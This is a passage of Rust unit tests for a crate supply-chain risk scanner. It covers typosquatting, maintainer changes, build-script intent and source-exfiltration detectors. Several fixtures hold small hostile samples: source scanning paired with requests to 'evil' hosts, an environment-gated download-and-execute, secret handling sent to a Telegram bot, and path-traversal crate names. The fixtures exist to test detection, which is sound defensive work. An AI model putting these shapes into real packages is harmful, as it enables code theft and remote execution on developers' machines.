1875    fn opts_with_meta(pairs: &[(&str, crate::CrateMetadata)]) -> AnalysisOptions {
1876        let mut metadata = std::collections::BTreeMap::new();
1877        for (k, m) in pairs {
1878            metadata.insert((*k).to_string(), m.clone());
1879        }
1880        AnalysisOptions {
1881            metadata,
1882            ..Default::default()
1883        }
1884    }
1885
#[test]
fn typosquat_cleared_by_high_downloads() {
    // `miow` sits one edit away from `mio`, yet it is a legitimate and widely
    // used crate (53M downloads): strong adoption has to suppress the flag.
    let established = crate::CrateMetadata {
        total_downloads: Some(53_000_000),
        ..Default::default()
    };
    let options = opts_with_meta(&[("miow@0.6.1", established)]);
    let lockfile = lock(vec![pkg("miow", "0.6.1", false)]);

    let mut found = Vec::new();
    collect_typosquat(&lockfile, &options, &mut found);

    assert!(
        !found.iter().any(|s| s.id == "possible_typosquat"),
        "established crate must not be flagged as a typosquat"
    );
}
1905
#[test]
fn typosquat_flagged_when_obscure() {
    // The same look-alike name with next to no downloads IS a suspect.
    let obscure = crate::CrateMetadata {
        total_downloads: Some(42),
        ..Default::default()
    };
    let options = opts_with_meta(&[("miow@0.0.1", obscure)]);
    let lockfile = lock(vec![pkg("miow", "0.0.1", false)]);

    let mut found = Vec::new();
    collect_typosquat(&lockfile, &options, &mut found);

    let flagged = found
        .iter()
        .find(|s| s.id == "possible_typosquat")
        .expect("obscure look-alike must be flagged");
    assert_eq!(flagged.severity, Severity::Medium);
}
1925
#[test]
fn typosquat_offline_is_quiet_info() {
    // With no metadata there is nothing to corroborate the suspicion, so the
    // result must be a quiet Info hint rather than a misleading Medium finding
    // (regression test for the `miow` false positive).
    let options = AnalysisOptions::default();
    let lockfile = lock(vec![pkg("miow", "0.6.1", false)]);

    let mut found = Vec::new();
    collect_typosquat(&lockfile, &options, &mut found);

    let hint = found
        .iter()
        .find(|s| s.id == "possible_typosquat")
        .expect("offline hint present");
    assert_eq!(hint.severity, Severity::Info);
}
1940
#[test]
fn freshness_flags_only_recent_versions() {
    let lockfile = lock(vec![pkg("somecrate", "1.0.0", false)]);
    // Run the freshness collector against one set of options.
    let run = |options: &AnalysisOptions| {
        let mut found = Vec::new();
        collect_freshness(&lockfile, options, &mut found);
        found
    };

    // Published three days ago: exactly one freshness signal.
    let recent = opts_with_meta(&[(
        "somecrate@1.0.0",
        crate::CrateMetadata {
            published_days_ago: Some(3),
            ..Default::default()
        },
    )]);
    let fresh_hits = run(&recent)
        .iter()
        .filter(|s| s.id == "freshly_published")
        .count();
    assert_eq!(fresh_hits, 1, "a 3-day-old version must be flagged fresh");

    // Published over a year ago: nothing at all.
    let aged = opts_with_meta(&[(
        "somecrate@1.0.0",
        crate::CrateMetadata {
            published_days_ago: Some(400),
            ..Default::default()
        },
    )]);
    assert!(
        run(&aged).is_empty(),
        "an old version must not be flagged fresh"
    );
}
1970
1971    fn opts_with_owners(meta: &[(&str, &[&str])], trusted: &[(&str, &[&str])]) -> AnalysisOptions {
1972        let mut metadata = std::collections::BTreeMap::new();
1973        for (k, owners) in meta {
1974            metadata.insert(
1975                (*k).to_string(),
1976                crate::CrateMetadata {
1977                    owners: owners.iter().map(|s| s.to_string()).collect(),
1978                    ..Default::default()
1979                },
1980            );
1981        }
1982        let mut trusted_owners = std::collections::BTreeMap::new();
1983        for (k, owners) in trusted {
1984            trusted_owners.insert(
1985                (*k).to_string(),
1986                owners.iter().map(|s| s.to_string()).collect(),
1987            );
1988        }
1989        AnalysisOptions {
1990            metadata,
1991            trusted_owners,
1992            ..Default::default()
1993        }
1994    }
1995
#[test]
fn owners_changed_flags_new_maintainer() {
    // The xz scenario: the trusted owner set was [Lasse] and is now
    // [Lasse, JiaT75]. A maintainer appearing out of nowhere must be flagged.
    let options = opts_with_owners(
        &[("xz2@0.1.7", &["Lasse", "JiaT75"])],
        &[("xz2", &["Lasse"])],
    );
    let lockfile = lock(vec![pkg("xz2", "0.1.7", false)]);

    let mut found = Vec::new();
    collect_owners_changed(&lockfile, &options, &mut found);

    let change = found
        .iter()
        .find(|s| s.id == "owners_changed")
        .expect("a new maintainer must be flagged");
    assert_eq!(change.severity, Severity::Medium);
    assert!(change.evidence[0].summary.contains("JiaT75"));
}
2014
#[test]
fn owners_unchanged_emits_nothing() {
    // Current owners equal the baseline, so there is nothing to report.
    let options = opts_with_owners(&[("serde@1.0.0", &["dtolnay"])], &[("serde", &["dtolnay"])]);
    let lockfile = lock(vec![pkg("serde", "1.0.0", false)]);

    let mut found = Vec::new();
    collect_owners_changed(&lockfile, &options, &mut found);

    assert!(found.is_empty(), "unchanged owners must not be flagged");
}
2023
#[test]
fn owners_without_baseline_emits_nothing() {
    // Without a baseline there is no reference point, so no change can (or
    // may) be claimed: trust is established first and detected second.
    let options = opts_with_owners(&[("serde@1.0.0", &["newowner"])], &[]);
    let lockfile = lock(vec![pkg("serde", "1.0.0", false)]);

    let mut found = Vec::new();
    collect_owners_changed(&lockfile, &options, &mut found);

    assert!(found.is_empty(), "no baseline -> no signal");
}
2034
#[test]
fn owners_changed_survives_known_good_baseline() {
    // Takeovers such as xz / event-stream hit ubiquitous, "known-good" crates,
    // so the known-good baseline must NOT downgrade an ownership change there.
    assert!(is_known_good("libc"), "test premise: libc is known-good");

    let options = opts_with_owners(
        &[("libc@0.2.0", &["alice", "mallory"])],
        &[("libc", &["alice"])],
    );
    let lockfile = lock(vec![pkg("libc", "0.2.0", false)]);
    let all_signals = collect_basic_signals(&lockfile, &options).unwrap();

    let change = all_signals
        .iter()
        .find(|s| s.id == "owners_changed")
        .expect("owners_changed present");
    assert_eq!(
        change.severity,
        Severity::Medium,
        "ownership change must survive the known-good baseline"
    );
    assert!(change.weight > 0, "must still count toward risk");
}
2057
#[test]
fn owners_changed_detected_on_later_version_without_first_metadata() {
    // Only the higher of two versions has owner metadata, and its owner set
    // differs from the baseline. The change must still be picked up, i.e. the
    // metadata-less lower version must not short-circuit detection.
    let options = opts_with_owners(
        &[("foo-crate@2.0.0", &["alice", "newowner"])],
        &[("foo-crate", &["alice"])],
    );
    let lockfile = lock(vec![
        pkg("foo-crate", "1.0.0", false),
        pkg("foo-crate", "2.0.0", false),
    ]);

    let mut found = Vec::new();
    collect_owners_changed(&lockfile, &options, &mut found);

    let changes = found.iter().filter(|s| s.id == "owners_changed").count();
    assert_eq!(
        changes, 1,
        "ownership change on a non-first version must be detected"
    );
}
2078
#[test]
fn locate_crate_dir_rejects_path_traversal() {
    // A hostile lockfile must never get a directory outside the root resolved.
    let root = std::env::temp_dir();

    // Hostile crate names.
    for evil in ["../../etc", "..", "foo/bar", "a/../../b"] {
        let hostile = pkg(evil, "1.0.0", false);
        let resolved = locate_crate_dir(&root, &hostile);
        assert!(
            resolved.is_none(),
            "traversal name {evil:?} must be refused"
        );
    }

    // A hostile version string is refused just the same.
    let hostile_version = pkg("serde", "../../etc", false);
    assert!(locate_crate_dir(&root, &hostile_version).is_none());
}
2094
#[test]
fn detects_native_ffi_by_name() {
    let lockfile = lock(vec![pkg("openssl-sys", "0.9.99", false)]);
    let mut found = Vec::new();
    collect_name_heuristics(&lockfile, &mut found);

    let ffi = found.iter().find(|s| s.id == "native_ffi_detected");
    assert!(ffi.is_some());
    let ffi = ffi.unwrap();
    // A name-only FFI hit is weak evidence: Low severity, modest confidence.
    assert_eq!(ffi.severity, Severity::Low);
    assert!(ffi.confidence >= 0.5);
}
2109
#[test]
fn known_good_crate_downgraded_to_baseline() {
    // Premise: `windows-sys` is on the known-good list, `openssl-sys` is not.
    assert!(is_known_good("windows-sys"));
    assert!(!is_known_good("openssl-sys"));

    let lockfile = lock(vec![pkg("windows-sys", "0.61.2", false)]);
    let all_signals = collect_basic_signals(&lockfile, &AnalysisOptions::default()).unwrap();

    // The FFI signal stays visible but no longer carries any risk weight.
    let ffi = all_signals
        .iter()
        .find(|s| s.id == "native_ffi_detected")
        .expect("signal kept for transparency");
    assert_eq!(ffi.severity, Severity::Info);
    assert_eq!(ffi.weight, 0);
    assert!(ffi.evidence.iter().any(|e| e.kind == "baseline"));
}
2124
#[test]
fn local_crate_not_flagged_for_ffi() {
    // A local (source-less) package with a `-sys` name yields no signal.
    let lockfile = lock(vec![pkg("my-app-sys", "0.1.0", true)]);
    let mut found = Vec::new();
    collect_name_heuristics(&lockfile, &mut found);
    assert!(found.is_empty());
}
2132
#[test]
fn damerau_levenshtein_basics() {
    // (left, right, expected distance)
    let cases = [
        ("serde", "serde", 0),      // identical
        ("serde", "serdf", 1),      // substitution
        ("tokio", "tokoi", 1),      // transposition
        ("reqwest", "reqwes", 1),   // deletion
        ("serde", "serde_json", 5), // five insertions
    ];
    for (left, right, expected) in cases {
        assert_eq!(damerau_levenshtein(left, right), expected);
    }
}
2141
#[test]
fn detects_typosquat_one_edit_away() {
    // `reqwset` is a transposition of `reqwest`.
    let lockfile = lock(vec![pkg("reqwset", "1.0.0", false)]);
    let mut found = Vec::new();
    collect_typosquat(&lockfile, &AnalysisOptions::default(), &mut found);

    let suspect = found
        .iter()
        .find(|s| s.id == "possible_typosquat")
        .unwrap();
    assert!(suspect.evidence[0].summary.contains("reqwest"));
}
2153
#[test]
fn does_not_flag_legitimate_crates() {
    // Real crates that merely resemble popular ones are far away in edit
    // distance; an exact popular name is not a typosquat either.
    let legitimate = vec![
        pkg("serde_json", "1.0.0", false),
        pkg("tokio-util", "0.7.0", false),
        pkg("my-app-utils", "0.1.0", false),
        pkg("serde", "1.0.0", false), // exact popular -> not flagged
    ];
    let lockfile = lock(legitimate);

    let mut signals = Vec::new();
    collect_typosquat(&lockfile, &AnalysisOptions::default(), &mut signals);
    assert!(signals.is_empty(), "false positives: {signals:?}");
}
2167
#[test]
fn legit_lookalikes_are_not_typosquats() {
    // Real, widely used crates that are one edit away from a popular crate
    // (`mime`↔`time`, `md-5`↔`md5`, `anes`↔`aes`). Regression test for a
    // corpus scan that wrongly flagged all three.
    let lookalikes = vec![
        pkg("mime", "0.3.17", false),
        pkg("md-5", "0.10.6", false),
        pkg("anes", "0.1.6", false),
    ];
    let lockfile = lock(lookalikes);

    let mut signals = Vec::new();
    collect_typosquat(&lockfile, &AnalysisOptions::default(), &mut signals);
    assert!(signals.is_empty(), "false positives: {signals:?}");
}
2182
/// Create a throwaway crate directory under the system temp dir and populate
/// its `src/` tree from the given `relative-path -> contents` pairs.
///
/// The directory name combines `tag`, the process id and the file count; a
/// leftover directory of the same name is removed first. The path of the
/// crate root is returned and nothing cleans it up automatically: callers
/// remove it themselves once done. No external crates (no `tempfile`).
fn scratch_crate(tag: &str, files: &[(&str, &str)]) -> PathBuf {
    let dir_name = format!(
        "rustinel_exfil_{}_{}_{}",
        tag,
        std::process::id(),
        files.len()
    );
    let root = std::env::temp_dir().join(dir_name);
    // Best effort: the directory usually does not exist yet.
    let _ = std::fs::remove_dir_all(&root);

    let src_dir = root.join("src");
    std::fs::create_dir_all(&src_dir).unwrap();
    for &(rel, body) in files {
        let target = src_dir.join(rel);
        // `rel` may contain sub-directories.
        if let Some(parent) = target.parent() {
            std::fs::create_dir_all(parent).unwrap();
        }
        std::fs::write(&target, body).unwrap();
    }
    root
}
2204
#[test]
fn source_exfil_signal_builds_high() {
    // The builder fires unconditionally (the caller has already confirmed the
    // per-file conjunction); the flags only select the `what` prose.
    let wallet = source_exfil_signal("x@1", false, true, "lib.rs".into());
    assert_eq!(wallet.id, "suspicious_source_exfil");
    assert_eq!(wallet.severity, Severity::High);
    let mentions_wallet = wallet
        .evidence
        .iter()
        .any(|e| e.summary.contains("wallet/private-key"));
    assert!(mentions_wallet);

    let network = source_exfil_signal("x@1", true, false, "lib.rs".into());
    let mentions_network = network
        .evidence
        .iter()
        .any(|e| e.summary.contains("exfiltrates over the network"));
    assert!(mentions_network);
}
2222
#[test]
fn source_exfil_conjunction_must_hold_in_one_file() {
    // The exfil sample reported for a crate dir, if any.
    let sample_of = |dir: &PathBuf| scan_source_exfil(dir).and_then(|s| s.source_exfil_sample);

    // Scanning sources alone is not the fingerprint (legit codegen helper).
    let only_scan = scratch_crate(
        "scan",
        &[(
            "codegen.rs",
            "let _ = std::fs::read_dir(\".\"); let x = \".rs\";",
        )],
    );
    assert!(sample_of(&only_scan).is_none());
    let _ = std::fs::remove_dir_all(&only_scan);

    // CROSS-FILE: one file scans `.rs` sources while a *separate* file uses
    // reqwest. Such a benign crate (codegen + HTTP client) must NOT be flagged;
    // this is the false attribution that the per-file conjunction prevents.
    let cross = scratch_crate(
        "cross",
        &[
            (
                "codegen.rs",
                "fn g(){ let _=std::fs::read_dir(\".\"); let _=\".rs\"; }",
            ),
            (
                "client.rs",
                "fn f(){ let _ = reqwest::blocking::get(\"http://x\"); }",
            ),
        ],
    );
    assert!(
        sample_of(&cross).is_none(),
        "cross-file scan + network must NOT fire (benign codegen + HTTP client)"
    );
    let _ = std::fs::remove_dir_all(&cross);

    // SINGLE FILE doing both: the real faster_log/async_println pattern.
    let bad = scratch_crate(
        "bad",
        &[(
            "steal.rs",
            concat!(
                "fn s(){ for e in std::fs::read_dir(\".\").unwrap(){ let _=\".rs\"; ",
                "let _=reqwest::blocking::get(\"http://evil\"); } }",
            ),
        )],
    );
    let report = scan_source_exfil(&bad).expect("scan");
    assert!(
        report.source_exfil_sample.is_some(),
        "single-file scan+network IS the fingerprint"
    );
    assert!(report.source_exfil_network);
    let _ = std::fs::remove_dir_all(&bad);
}
2279
#[test]
fn env_gated_requires_causal_proximity() {
    // Tight (rustdecimal shape): env gate, download and spawn sit within a few
    // lines of one block -> flagged.
    let tight = concat!(
        "fn run() {\n",
        "    if std::env::var(\"GITLAB_CI\").is_ok() {\n",
        "        let _ = reqwest::blocking::get(\"http://x/p.bin\");\n",
        "        std::process::Command::new(\"/tmp/p.bin\").status();\n",
        "    }\n",
        "}\n",
    );
    assert!(
        env_gated_block(tight),
        "tight download-and-execute must be flagged"
    );

    // Scattered (large-CLI false positive): the same three primitives occur,
    // but far apart and causally unrelated -> NOT flagged.
    let filler = "// unrelated code\n".repeat(80);
    let scattered = [
        "let _cfg = std::env::var(\"APP_RPC\");\n",
        filler.as_str(),
        "let _ = reqwest::blocking::get(\"https://rpc.example\");\n",
        filler.as_str(),
        "std::process::Command::new(resolve_cargo_binary()).status();\n",
    ]
    .concat();
    assert!(
        !env_gated_block(&scattered),
        "unrelated env/network/spawn scattered across a large file must NOT be flagged"
    );
}
2304
#[test]
fn dual_use_service_domain_needs_secret_corroboration() {
    // The exfil-domain finding reported for a crate dir, if any.
    let domain_of = |dir: &PathBuf| scan_source_exfil(dir).and_then(|s| s.exfil_domain);

    // A purpose-built integration crate talking to its own service (Telegram)
    // without any secret handling must NOT be flagged just for using the API.
    let benign = scratch_crate(
        "tg_benign",
        &[(
            "lib.rs",
            "pub fn send(){ let _=reqwest::blocking::get(\"https://api.telegram.org/bot1/sendMessage\"); }",
        )],
    );
    assert!(
        domain_of(&benign).is_none(),
        "a telegram crate must not trip the domain signal without the exfil shape"
    );
    let _ = std::fs::remove_dir_all(&benign);

    // The same service domain plus secret material in the file is the exfil shape.
    let exfil = scratch_crate(
        "tg_exfil",
        &[(
            "lib.rs",
            "pub fn steal(){ let _k=\"private_key\"; let _=reqwest::blocking::get(\"https://api.telegram.org/bot/x\"); }",
        )],
    );
    assert!(
        domain_of(&exfil).is_some(),
        "telegram + secret handling IS the exfil shape"
    );
    let _ = std::fs::remove_dir_all(&exfil);

    // A pure exfil host has no legitimate reason to be hardcoded -> flagged
    // regardless of anything else.
    let host = scratch_crate(
        "cf_exfil",
        &[(
            "lib.rs",
            "pub fn x(){ let _=reqwest::blocking::get(\"https://evil.workers.dev/c\"); }",
        )],
    );
    assert!(
        domain_of(&host).is_some(),
        "a pure exfil host is suspicious on its own"
    );
    let _ = std::fs::remove_dir_all(&host);
}
2356
#[test]
fn evidence_sample_is_walk_order_independent() {
    // Both source files contain `unsafe`. The evidence path must be the
    // lexicographically first match (`a_first.rs`), never whichever file
    // `read_dir` happens to yield first; otherwise --no-timestamp output would
    // vary between filesystems. The walk goes through `sorted_dir_entries`,
    // which is what makes the sample deterministic.
    let files = [
        ("z_last.rs", "pub unsafe fn z() { unsafe {} }"),
        ("a_first.rs", "pub unsafe fn a() { unsafe {} }"),
    ];
    let crate_dir = scratch_crate("unsafe_det", &files);

    let (stats, sample) = count_unsafe(&crate_dir).expect("unsafe found in the crate");
    assert!(stats.total >= 2, "both files' unsafe should be counted");
    assert!(
        sample.ends_with("a_first.rs"),
        "evidence sample must be the lexicographically-first match, was {sample:?}"
    );
    let _ = std::fs::remove_dir_all(&crate_dir);
}
2379
#[test]
fn sorted_dir_entries_is_lexicographic() {
    // Files are created out of order; the listing must come back sorted.
    let crate_dir = scratch_crate(
        "sorted_entries",
        &[("c.rs", "x"), ("a.rs", "x"), ("b.rs", "x")],
    );
    let listing = sorted_dir_entries(&crate_dir.join("src"));
    let names: Vec<String> = listing
        .iter()
        .map(|e| e.file_name().to_string_lossy().into_owned())
        .collect();
    assert_eq!(names, ["a.rs", "b.rs", "c.rs"]);
    let _ = std::fs::remove_dir_all(&crate_dir);
}
2393
#[test]
fn benign_build_script_is_not_suspicious() {
    // The legit cc-style fixture: it does nothing but emit a link directive.
    let script = concat!(
        "fn main() {\n",
        "    println!(\"cargo:rustc-link-lib=ssl\");\n",
        "}\n",
    );
    let verdict = build_script_intent_signal("openssl-sys@0.9.99", script, "build.rs".into());
    assert!(verdict.is_none());
}
2400
#[test]
fn network_build_script_is_high() {
    // A build script that reaches out to the network is a High finding.
    let script = "fn main(){ let _ = reqwest::blocking::get(\"http://evil/x\"); }";
    let finding = build_script_intent_signal("evil@1.0.0", script, "build.rs".into()).unwrap();
    assert_eq!(finding.id, "build_script_suspicious");
    assert_eq!(finding.severity, Severity::High);
    let mentions_network = finding
        .evidence
        .iter()
        .any(|e| e.summary.contains("network access"));
    assert!(mentions_network);
}
2412
#[test]
fn payload_build_script_is_medium() {
    // Embedding a binary blob in a build script is a Medium finding.
    let script = "fn main(){ let p = include_bytes!(\"blob.bin\"); let _ = p; }";
    let finding = build_script_intent_signal("sneaky@1.0.0", script, "build.rs".into()).unwrap();
    assert_eq!(finding.severity, Severity::Medium);
    let mentions_payload = finding
        .evidence
        .iter()
        .any(|e| e.summary.contains("payload"));
    assert!(mentions_payload);
}
2420
#[test]
fn dlopen_in_a_feature_name_is_not_a_payload() {
    // Regression: the `dlopen` marker used to match the substring inside a
    // cargo feature / env-var name (`source-fontconfig-dlopen`) and flagged a
    // tiny build.rs that only forwards a cfg flag. The call form is required.
    let benign = concat!(
        "fn main(){\n",
        "  println!(\"cargo:rerun-if-env-changed=RUST_FONTCONFIG_DLOPEN\");\n",
        "  if std::env::var(\"RUST_FONTCONFIG_DLOPEN\").is_ok() {\n",
        "    println!(\"cargo:rustc-cfg=feature=\\\"source-fontconfig-dlopen\\\"\");\n",
        "  }\n",
        "}\n",
    );
    let benign_verdict = build_script_intent_signal("font-kit@1.0.0", benign, "build.rs".into());
    assert!(
        benign_verdict.is_none(),
        "a `*-dlopen` feature/env name must not be read as dynamic loading"
    );

    // A real FFI dynamic-load call is still flagged.
    let real = "fn main(){ unsafe { let _ = libc::dlopen(p, 1); } }";
    let real_verdict = build_script_intent_signal("x@1.0.0", real, "build.rs".into());
    assert!(real_verdict.is_some());
}
2437
#[test]
fn detects_multiple_versions() {
    // A lockfile model listing `foo` at both 1.0.0 and 2.0.0 is expected to
    // produce exactly two `multiple_versions_same_crate` signals.
    let packages = vec![pkg("foo", "1.0.0", false), pkg("foo", "2.0.0", false)];
    let lockfile = lock(packages);

    let mut found = Vec::new();
    collect_multiple_versions(&lockfile, &mut found);

    let duplicates = found
        .iter()
        .filter(|signal| signal.id == "multiple_versions_same_crate")
        .count();
    assert_eq!(duplicates, 2);
}
2451
#[test]
fn unsafe_scan_counts_only_real_code() {
    // Shorthand: total number of `unsafe` occurrences reported for a snippet.
    let total_in = |source: &str| scan_unsafe(source).total;

    assert_eq!(total_in("unsafe { *p }"), 1);
    assert_eq!(total_in("no danger here"), 0);
    // The identifier `unsafely` is not the keyword, and the trailing
    // `// unsafe` sits inside a line comment, so nothing is counted.
    assert_eq!(total_in("let unsafely = 1; // unsafe"), 0);
}
2459
#[test]
fn unsafe_scan_ignores_comments_and_strings() {
    // The fixture mentions `unsafe` inside a line comment, a nested block
    // comment, an ordinary string and a raw string; the only occurrence that
    // is actual code is the block inside `real()`.
    let fixture = r##"
            // unsafe in a line comment
            /* unsafe in a block /* nested unsafe */ comment */
            let s = "this unsafe is a string";
            let r = r#"raw unsafe"#;
            fn real() { unsafe { } }
        "##;

    // The binding is named `st` because the assertion message captures it.
    let st = scan_unsafe(fixture);
    assert_eq!(st.total, 1, "only the real unsafe block counts, got {st:?}");
    assert_eq!(st.blocks, 1);
}
2473
#[test]
fn unsafe_scan_categorizes() {
    // The snippet holds one `unsafe fn`, one `unsafe impl`, one `unsafe trait`
    // and one `unsafe` block, so every category counter should read 1.
    let stats = scan_unsafe(
        "unsafe fn a(){} unsafe impl T for U {} unsafe trait W {} fn b(){ unsafe { } }",
    );

    assert_eq!(stats.total, 4);
    assert_eq!(
        (stats.fns, stats.impls, stats.traits, stats.blocks),
        (1, 1, 1, 1)
    );
    // The human-readable breakdown lists the total followed by each category.
    assert_eq!(stats.breakdown(), "4 (1 fn, 1 impl, 1 trait, 1 block)");
}
2485
#[test]
fn unsafe_scan_handles_char_literal_with_quote() {
    // The char literal `'"'` contains a double quote. If the scanner mistook
    // it for the start of a string, the `unsafe` block after it would be
    // swallowed and the count would drop to 0.
    let stats = scan_unsafe("let q = '\"'; unsafe { }");
    assert_eq!(stats.total, 1);
}
2492
#[test]
fn sort_is_severity_descending() {
    // Builds a signal for package "p"; the two fixtures differ only in id and
    // severity, every other field is a fixed placeholder.
    let make = |id: &str, severity: Severity| RiskSignal {
        id: id.into(),
        package: "p".into(),
        severity,
        weight: 1,
        confidence: 1.0,
        evidence: vec![],
        recommendation: String::new(),
    };

    // Low comes first on input, so the sort has to move High to the front.
    let mut signals = vec![make("a", Severity::Low), make("b", Severity::High)];
    sort_signals(&mut signals);
    assert_eq!(signals[0].severity, Severity::High);
}
2518}